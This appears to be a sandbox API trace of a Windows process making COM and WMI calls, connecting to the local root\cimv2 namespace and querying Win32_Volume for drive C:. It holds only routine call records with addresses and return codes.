	[0242.088] CoGetObjectContext (in: riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x562d0c | out: ppv=0x562d0c*=0x4a8de0) returned 0x0
	[0242.088] WbemDefPath:IUnknown:QueryInterface (in: This=0x6080820, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadf20 | out: ppvObject=0x5fadf20*=0x57d348) returned 0x0
	[0242.088] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x57d348, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadf28 | out: pCid=0x5fadf28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0242.088] WbemDefPath:IUnknown:Release (This=0x57d348) returned 0x3
	[0242.088] CoGetContextToken (in: pToken=0x5fadf30 | out: pToken=0x5fadf30) returned 0x0
	[0242.088] WbemDefPath:IUnknown:AddRef (This=0x6080820) returned 0x4
	[0242.089] WbemDefPath:IUnknown:QueryInterface (in: This=0x6080820, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadfa4 | out: ppvObject=0x5fadfa4*=0x0) returned 0x80004002
	[0242.089] WbemDefPath:IUnknown:Release (This=0x6080820) returned 0x3
	[0242.089] WbemDefPath:IUnknown:Release (This=0x6080820) returned 0x2
	[0242.089] WbemDefPath:IUnknown:Release (This=0x6080810) returned 0x0
	[0242.089] WbemDefPath:IUnknown:Release (This=0x6080820) returned 0x1
	[0242.090] CoGetContextToken (in: pToken=0x5fae7e0 | out: pToken=0x5fae7e0) returned 0x0
	[0242.090] CoGetContextToken (in: pToken=0x5fae7a0 | out: pToken=0x5fae7a0) returned 0x0
	[0242.090] WbemDefPath:IUnknown:AddRef (This=0x6080820) returned 0x2
	[0242.090] WbemDefPath:IUnknown:QueryInterface (in: This=0x6080820, riid=0x5fae81c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae818 | out: ppvObject=0x5fae818*=0x6080820) returned 0x0
	[0242.090] WbemDefPath:IUnknown:Release (This=0x6080820) returned 0x2
	[0242.090] WbemDefPath:IUnknown:Release (This=0x6080820) returned 0x1
	[0242.091] CoGetObjectContext (in: riid=0x2e7ab54*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae1f0 | out: ppv=0x5fae1f0*=0x4a8dec) returned 0x0
	[0242.091] IComThreadingInfo:GetCurrentApartmentType (in: This=0x4a8dec, pAptType=0x5fae1e8 | out: pAptType=0x5fae1e8*=1) returned 0x0
	[0242.091] IUnknown:QueryInterface (in: This=0x4a8dec, riid=0x2e7ab3c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5fae1ec | out: ppvObject=0x5fae1ec*=0x0) returned 0x80004002
	[0242.091] IUnknown:Release (This=0x4a8dec) returned 0x1
	[0242.093] CoGetClassObject (in: rclsid=0x563d04*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fadd08 | out: ppv=0x5fadd08*=0x6080810) returned 0x0
	[0242.094] WbemDefPath:IUnknown:QueryInterface (in: This=0x6080810, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fadb38 | out: ppvObject=0x5fadb38*=0x0) returned 0x80004002
	[0242.094] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6080810, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadb70 | out: ppvObject=0x5fadb70*=0x60808b8) returned 0x0
	[0242.094] WbemDefPath:IUnknown:QueryInterface (in: This=0x60808b8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fad914 | out: ppvObject=0x5fad914*=0x60808b8) returned 0x0
	[0242.094] WbemDefPath:IUnknown:QueryInterface (in: This=0x60808b8, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fad8d0 | out: ppvObject=0x5fad8d0*=0x0) returned 0x80004002
	[0242.094] WbemDefPath:IUnknown:AddRef (This=0x60808b8) returned 0x3
	[0242.095] CoGetContextToken (in: pToken=0x5fad75c | out: pToken=0x5fad75c) returned 0x0
	[0242.095] WbemDefPath:IUnknown:QueryInterface (in: This=0x60808b8, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fad744 | out: ppvObject=0x5fad744*=0x57d358) returned 0x0
	[0242.095] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x57d358, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fad74c | out: pCid=0x5fad74c*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0242.095] WbemDefPath:IUnknown:Release (This=0x57d358) returned 0x3
	[0242.095] CoGetContextToken (in: pToken=0x5fad754 | out: pToken=0x5fad754) returned 0x0
	[0242.095] WbemDefPath:IUnknown:AddRef (This=0x60808b8) returned 0x4
	[0242.095] WbemDefPath:IUnknown:QueryInterface (in: This=0x60808b8, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fad7c8 | out: ppvObject=0x5fad7c8*=0x0) returned 0x80004002
	[0242.095] WbemDefPath:IUnknown:Release (This=0x60808b8) returned 0x3
	[0242.095] WbemDefPath:IUnknown:Release (This=0x60808b8) returned 0x2
	[0242.095] WbemDefPath:IUnknown:Release (This=0x6080810) returned 0x0
	[0242.096] WbemDefPath:IUnknown:Release (This=0x60808b8) returned 0x1
	[0242.096] CoGetContextToken (in: pToken=0x5fae004 | out: pToken=0x5fae004) returned 0x0
	[0242.096] CoGetContextToken (in: pToken=0x5fadfc4 | out: pToken=0x5fadfc4) returned 0x0
	[0242.096] WbemDefPath:IUnknown:AddRef (This=0x60808b8) returned 0x2
	[0242.096] WbemDefPath:IUnknown:QueryInterface (in: This=0x60808b8, riid=0x5fae040*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae03c | out: ppvObject=0x5fae03c*=0x60808b8) returned 0x0
	[0242.096] WbemDefPath:IUnknown:Release (This=0x60808b8) returned 0x2
	[0242.096] WbemDefPath:IUnknown:Release (This=0x60808b8) returned 0x1
	[0242.106] CoGetContextToken (in: pToken=0x5fae084 | out: pToken=0x5fae084) returned 0x0
	[0242.106] CoGetContextToken (in: pToken=0x5fae044 | out: pToken=0x5fae044) returned 0x0
	[0242.106] WbemDefPath:IUnknown:AddRef (This=0x60808b8) returned 0x2
	[0242.106] WbemDefPath:IUnknown:QueryInterface (in: This=0x60808b8, riid=0x5fae0c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae0bc | out: ppvObject=0x5fae0bc*=0x60808b8) returned 0x0
	[0242.106] WbemDefPath:IUnknown:Release (This=0x60808b8) returned 0x2
	[0242.107] WbemDefPath:IUnknown:AddRef (This=0x60808b8) returned 0x3
	[0242.107] WbemDefPath:IWbemPath:SetText (This=0x60808b8, uMode=0x4, pszPath="//./root/cimv2") returned 0x0
	[0242.107] WbemDefPath:IUnknown:Release (This=0x60808b8) returned 0x2
	[0242.107] CoGetContextToken (in: pToken=0x5fae860 | out: pToken=0x5fae860) returned 0x0
	[0242.107] CoGetContextToken (in: pToken=0x5fae820 | out: pToken=0x5fae820) returned 0x0
	[0242.107] WbemDefPath:IUnknown:AddRef (This=0x6080820) returned 0x2
	[0242.108] WbemDefPath:IUnknown:QueryInterface (in: This=0x6080820, riid=0x5fae89c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae898 | out: ppvObject=0x5fae898*=0x6080820) returned 0x0
	[0242.108] WbemDefPath:IUnknown:Release (This=0x6080820) returned 0x2
	[0242.108] WbemDefPath:IUnknown:AddRef (This=0x6080820) returned 0x3
	[0242.108] WbemDefPath:IWbemPath:SetText (This=0x6080820, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0242.108] WbemDefPath:IUnknown:Release (This=0x6080820) returned 0x2
	[0242.169] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6080820, puCount=0x5faea04 | out: puCount=0x5faea04*=0x2) returned 0x0
	[0242.174] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=4, puBuffLength=0x5faea00*=0x0, pszText=0x0 | out: puBuffLength=0x5faea00*=0x17, pszText=0x0) returned 0x0
	[0242.176] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=4, puBuffLength=0x5faea00*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea00*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0242.178] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6080820, puCount=0x5faea00 | out: puCount=0x5faea00*=0x2) returned 0x0
	[0242.178] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=4, puBuffLength=0x5fae9fc*=0x0, pszText=0x0 | out: puBuffLength=0x5fae9fc*=0x17, pszText=0x0) returned 0x0
	[0242.178] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=4, puBuffLength=0x5fae9fc*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae9fc*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0242.178] CoGetObjectContext (in: riid=0x2e7ab54*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae97c | out: ppv=0x5fae97c*=0x4a8dec) returned 0x0
	[0242.178] IComThreadingInfo:GetCurrentApartmentType (in: This=0x4a8dec, pAptType=0x5fae974 | out: pAptType=0x5fae974*=1) returned 0x0
	[0242.178] IUnknown:QueryInterface (in: This=0x4a8dec, riid=0x2e7ab3c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5fae978 | out: ppvObject=0x5fae978*=0x0) returned 0x80004002
	[0242.178] IUnknown:Release (This=0x4a8dec) returned 0x1
	[0242.179] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x5fae864 | out: lpiid=0x5fae864) returned 0x0
	[0242.179] CoGetClassObject (in: rclsid=0x556acc*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae7cc | out: ppv=0x5fae7cc*=0x6080ad0) returned 0x0
	[0242.358] WbemLocator:IUnknown:QueryInterface (in: This=0x6080ad0, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fae5fc | out: ppvObject=0x5fae5fc*=0x0) returned 0x80004002
	[0242.358] WbemLocator:IClassFactory:CreateInstance (in: This=0x6080ad0, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae634 | out: ppvObject=0x5fae634*=0x6080bf0) returned 0x0
	[0242.358] WbemLocator:IUnknown:QueryInterface (in: This=0x6080bf0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3d8 | out: ppvObject=0x5fae3d8*=0x6080bf0) returned 0x0
	[0242.358] WbemLocator:IUnknown:QueryInterface (in: This=0x6080bf0, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fae394 | out: ppvObject=0x5fae394*=0x0) returned 0x80004002
	[0242.359] WbemLocator:IUnknown:AddRef (This=0x6080bf0) returned 0x3
	[0242.359] CoGetContextToken (in: pToken=0x5fae220 | out: pToken=0x5fae220) returned 0x0
	[0242.359] WbemLocator:IUnknown:QueryInterface (in: This=0x6080bf0, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae208 | out: ppvObject=0x5fae208*=0x0) returned 0x80004002
	[0242.359] CoGetContextToken (in: pToken=0x5fae218 | out: pToken=0x5fae218) returned 0x0
	[0242.359] WbemLocator:IUnknown:AddRef (This=0x6080bf0) returned 0x4
	[0242.359] WbemLocator:IUnknown:QueryInterface (in: This=0x6080bf0, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae28c | out: ppvObject=0x5fae28c*=0x0) returned 0x80004002
	[0242.359] WbemLocator:IUnknown:Release (This=0x6080bf0) returned 0x3
	[0242.359] WbemLocator:IUnknown:Release (This=0x6080bf0) returned 0x2
	[0242.359] WbemLocator:IUnknown:Release (This=0x6080ad0) returned 0x0
	[0242.360] WbemLocator:IUnknown:Release (This=0x6080bf0) returned 0x1
	[0242.360] CoGetContextToken (in: pToken=0x5fae724 | out: pToken=0x5fae724) returned 0x0
	[0242.360] CoGetContextToken (in: pToken=0x5fae6e4 | out: pToken=0x5fae6e4) returned 0x0
	[0242.360] WbemLocator:IUnknown:AddRef (This=0x6080bf0) returned 0x2
	[0242.360] WbemLocator:IUnknown:QueryInterface (in: This=0x6080bf0, riid=0x5fae760*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5fae75c | out: ppvObject=0x5fae75c*=0x6080bf0) returned 0x0
	[0242.360] WbemLocator:IUnknown:Release (This=0x6080bf0) returned 0x2
	[0242.360] WbemLocator:IUnknown:Release (This=0x6080bf0) returned 0x1
	[0242.361] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6080820, puCount=0x5fae954 | out: puCount=0x5fae954*=0x2) returned 0x0
	[0242.361] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=8, puBuffLength=0x5fae950*=0x0, pszText=0x0 | out: puBuffLength=0x5fae950*=0x17, pszText=0x0) returned 0x0
	[0242.362] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=8, puBuffLength=0x5fae950*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae950*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0242.362] CoCreateInstance (in: rclsid=0x6a3113a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6a3112d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x5fae42c | out: ppv=0x5fae42c*=0x6080c00) returned 0x0
	[0242.362] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6080c00, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x5fae478 | out: ppNamespace=0x5fae478*=0x608d3c4) returned 0x0
	[0244.499] WbemLocator:IUnknown:QueryInterface (in: This=0x608d3c4, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae348 | out: ppvObject=0x5fae348*=0x585fdc) returned 0x0
	[0244.500] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x585fdc, pProxy=0x608d3c4, pAuthnSvc=0x5fae390, pAuthzSvc=0x5fae38c, pServerPrincName=0x5fae39c, pAuthnLevel=0x5fae394, pImpLevel=0x5fae380, pAuthInfo=0x5fae384, pCapabilites=0x5fae388 | out: pAuthnSvc=0x5fae390*=0xa, pAuthzSvc=0x5fae38c*=0x0, pServerPrincName=0x5fae39c, pAuthnLevel=0x5fae394*=0x6, pImpLevel=0x5fae380*=0x2, pAuthInfo=0x5fae384, pCapabilites=0x5fae388*=0x1) returned 0x0
	[0244.500] WbemLocator:IUnknown:Release (This=0x585fdc) returned 0x1
	[0244.500] WbemLocator:IUnknown:QueryInterface (in: This=0x608d3c4, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae33c | out: ppvObject=0x5fae33c*=0x585ffc) returned 0x0
	[0244.501] WbemLocator:IUnknown:QueryInterface (in: This=0x608d3c4, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae338 | out: ppvObject=0x5fae338*=0x585fdc) returned 0x0
	[0244.501] WbemLocator:IClientSecurity:SetBlanket (This=0x585fdc, pProxy=0x608d3c4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0244.501] WbemLocator:IUnknown:Release (This=0x585fdc) returned 0x2
	[0244.501] WbemLocator:IUnknown:Release (This=0x585ffc) returned 0x1
	[0244.501] CoTaskMemFree (pv=0x5862c8) 
	[0244.501] WbemLocator:IUnknown:Release (This=0x6080c00) returned 0x0
	[0244.501] WbemLocator:IUnknown:QueryInterface (in: This=0x608d3c4, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadcf8 | out: ppvObject=0x5fadcf8*=0x585ffc) returned 0x0
	[0244.501] WbemLocator:IUnknown:QueryInterface (in: This=0x585ffc, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadcb4 | out: ppvObject=0x5fadcb4*=0x0) returned 0x80004002
	[0244.509] WbemLocator:IUnknown:QueryInterface (in: This=0x585ffc, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fadba8 | out: ppvObject=0x5fadba8*=0x0) returned 0x80004002
	[0244.510] WbemLocator:IUnknown:AddRef (This=0x585ffc) returned 0x3
	[0244.510] CoGetContextToken (in: pToken=0x5fadb40 | out: pToken=0x5fadb40) returned 0x0
	[0244.510] WbemLocator:IUnknown:QueryInterface (in: This=0x585ffc, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadb28 | out: ppvObject=0x5fadb28*=0x585f5c) returned 0x0
	[0244.510] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x585f5c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadb30 | out: pCid=0x5fadb30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0244.510] WbemLocator:IUnknown:Release (This=0x585f5c) returned 0x3
	[0244.510] CoGetContextToken (in: pToken=0x5fadb38 | out: pToken=0x5fadb38) returned 0x0
	[0244.510] WbemLocator:IUnknown:AddRef (This=0x585ffc) returned 0x4
	[0244.511] WbemLocator:IUnknown:QueryInterface (in: This=0x585ffc, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadbac | out: ppvObject=0x5fadbac*=0x585fe4) returned 0x0
	[0244.511] WbemLocator:IUnknown:Release (This=0x585ffc) returned 0x4
	[0244.511] WbemLocator:IRpcOptions:Query (in: This=0x585fe4, pPrx=0x585ffc, dwProperty=2, pdwValue=0x5fadbd0 | out: pdwValue=0x5fadbd0) returned 0x80004002
	[0244.511] WbemLocator:IUnknown:Release (This=0x585fe4) returned 0x3
	[0244.511] WbemLocator:IUnknown:Release (This=0x585ffc) returned 0x2
	[0244.511] CoGetContextToken (in: pToken=0x5fadfac | out: pToken=0x5fadfac) returned 0x0
	[0244.511] CoGetContextToken (in: pToken=0x5fadf6c | out: pToken=0x5fadf6c) returned 0x0
	[0244.511] WbemLocator:IUnknown:AddRef (This=0x585ffc) returned 0x3
	[0244.511] WbemLocator:IUnknown:QueryInterface (in: This=0x585ffc, riid=0x5fadfe8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5fadfe4 | out: ppvObject=0x5fadfe4*=0x608d3c4) returned 0x0
	[0244.511] WbemLocator:IUnknown:Release (This=0x585ffc) returned 0x3
	[0244.512] WbemLocator:IUnknown:Release (This=0x608d3c4) returned 0x2
	[0244.512] WbemLocator:IUnknown:Release (This=0x608d3c4) returned 0x1
	[0244.512] CoGetContextToken (in: pToken=0x5fae8c8 | out: pToken=0x5fae8c8) returned 0x0
	[0244.512] WbemLocator:IUnknown:AddRef (This=0x585ffc) returned 0x2
	[0244.512] WbemLocator:IUnknown:QueryInterface (in: This=0x585ffc, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae4ec | out: ppvObject=0x5fae4ec*=0x585ffc) returned 0x0
	[0244.513] WbemLocator:IUnknown:Release (This=0x585ffc) returned 0x2
	[0244.513] WbemLocator:IUnknown:Release (This=0x585ffc) returned 0x1
	[0244.513] CoGetContextToken (in: pToken=0x5fae0cc | out: pToken=0x5fae0cc) returned 0x0
	[0244.513] CoGetContextToken (in: pToken=0x5fae08c | out: pToken=0x5fae08c) returned 0x0
	[0244.513] WbemLocator:IUnknown:AddRef (This=0x585ffc) returned 0x2
	[0244.513] WbemLocator:IUnknown:QueryInterface (in: This=0x585ffc, riid=0x5fae108*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5fae104 | out: ppvObject=0x5fae104*=0x608d3c4) returned 0x0
	[0244.513] WbemLocator:IUnknown:Release (This=0x585ffc) returned 0x2
	[0244.513] WbemLocator:IUnknown:AddRef (This=0x608d3c4) returned 0x3
	[0244.513] IWbemServices:ExecQuery (in: This=0x608d3c4, strQueryLanguage="WQL", strQuery="select * from Win32_Volume where Name='C:\\\\'", lFlags=16, pCtx=0x0, ppEnum=0x5fae710 | out: ppEnum=0x5fae710*=0x608cb34) returned 0x0
	[0244.554] IUnknown:QueryInterface (in: This=0x608cb34, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3bc | out: ppvObject=0x5fae3bc*=0x608cb38) returned 0x0
	[0244.554] IClientSecurity:QueryBlanket (in: This=0x608cb38, pProxy=0x608cb34, pAuthnSvc=0x5fae404, pAuthzSvc=0x5fae400, pServerPrincName=0x5fae410, pAuthnLevel=0x5fae408, pImpLevel=0x5fae3f4, pAuthInfo=0x5fae3f8, pCapabilites=0x5fae3fc | out: pAuthnSvc=0x5fae404*=0xa, pAuthzSvc=0x5fae400*=0x0, pServerPrincName=0x5fae410, pAuthnLevel=0x5fae408*=0x6, pImpLevel=0x5fae3f4*=0x2, pAuthInfo=0x5fae3f8, pCapabilites=0x5fae3fc*=0x1) returned 0x0
	[0244.554] IUnknown:Release (This=0x608cb38) returned 0x1
	[0244.554] IUnknown:QueryInterface (in: This=0x608cb34, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3b0 | out: ppvObject=0x5fae3b0*=0x586c4c) returned 0x0
